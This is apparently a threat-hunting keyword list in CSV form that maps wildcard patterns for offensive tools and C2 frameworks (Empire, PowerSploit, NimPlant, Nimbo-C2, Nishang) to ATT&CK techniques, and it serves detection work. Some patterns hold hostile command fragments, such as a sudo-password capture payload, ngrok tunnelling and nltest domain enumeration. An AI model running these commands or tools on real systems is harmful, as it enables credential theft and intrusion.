- DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*New-RoutingPacket*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-UserPersistenceOption*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-UserPersistenceOption*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*New-VolumeShadowCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*New-WmiSession.ps1*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*Nexpose*,offensive_tool_keyword,rapid7,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://www.rapid7.com/products/nexpose/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nextnet.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*NextronSystems*,offensive_tool_keyword,Github Username,Author of APT simulator,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/NextronSystems,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nginx/striker.log*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,0,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ngrok tcp *,greyware_tool_keyword,ngrok,ngrok - abused by attackers for C2 usage,T1090 - T1095 - T1008,TA0011 - TA0002 - TA0004,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*-nh 127.0.0.1 -nP 7687 -nu neo4j -np *,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,0,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*nheiniger/SnaffPoint*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,0,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*nhfjkakglbnnpkpldhjmpmmfefifedcj*,greyware_tool_keyword,Pron VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nhnfcgpcbfclhfafjlooihdfghaeinfc*,greyware_tool_keyword,Surf VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Nick Swink aka c0rnbread*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,0,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*nickvourd/COM-Hunter*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*nickvourd/Supernova*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,1,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*,offensive_tool_keyword,sudoSnatch,sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.,T1552.001 - T1056.001 - T1071.001,TA0006 - TA0004 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Nightmangle-master*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,1,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*nikto/program*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*NimBlackout*.exe*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*NimBlackout.*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*NimBlackout-main*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*nimbo_main*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*nimbo_prompt_color*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*nimbo_root*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Nimbo-C2 w1ll r0ck y0ur w0rld*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Nimbo-C2*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Nimbo-C2.*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*nimbo-dependencies*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*nimbuspwn.py*,offensive_tool_keyword,POC,This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800),T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/Immersive-Labs-Sec/nimbuspwn,1,1,N/A,N/A,1,21,5,2022-05-05T10:02:27Z,2022-04-27T13:04:33Z -*nimcrypt -*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,0,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -*nimcrypt --file *,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,0,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z -*nimcrypt.nim*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,1,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -*NimExec.exe*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,1,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*NimExec-master*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,1,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*NimPlant v*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplant-*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant*.tar.gz*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant*.zip*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplant.db*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant.dll*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant.nimble*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant.py*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplantPrint*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplants-*.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplants.html*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimShellCodeLoader*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*NimSyscallLoader -*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Ninja c2*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*ninjac2*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*nipe.pl *,offensive_tool_keyword,nipe,An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.,T1560 - T1573 - T1578,TA0005 - TA0007,N/A,N/A,Data Exfiltration,https://github.com/htrgouvea/nipe,1,0,N/A,N/A,10,1692,315,2023-09-22T12:35:29Z,2015-09-07T18:47:10Z -*nishang.exe*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*nishang.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*nishang.psm1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*NixImports by dr4k0nia*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,0,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*NixImports.csproj*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*NixImports.exe*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*NixImports.git*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*NixImports.sln*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*njpmifchgidinihmijhcfpbdmglecdlb*,greyware_tool_keyword,Trellonet Trellonet,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nlbejmccbhkncgokjcmghpfloaajcffj*,greyware_tool_keyword,Hotspot Shield Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nltest /all_trusts*,greyware_tool_keyword,nltest,enumerate domain trusts with nltest,T1482 - T1018,TA0007,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nltest /dclist*,greyware_tool_keyword,nltest,enumerate domain trusts with nltest,T1482 - T1018,TA0007,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nltest /domain_trusts*,greyware_tool_keyword,nltest,enumerate domain trusts with nltest,T1482 - T1018,TA0007,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*nmake inject_local *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*nmap -*,greyware_tool_keyword,nmap,A very common tool. Network host vuln and port detector.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Information Gathering,https://github.com/nmap/nmap,1,0,greyware tool - risks of False positive !,N/A,10,8299,2206,2023-09-29T08:27:35Z,2012-03-09T14:47:43Z -*nmap * --script=*.nse*,greyware_tool_keyword,nmap,check exploit for CVEs with nmap,T1046 - T1065 - T1202 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation Tools,https://nmap.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*nmap -Pn -v -sS -F*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 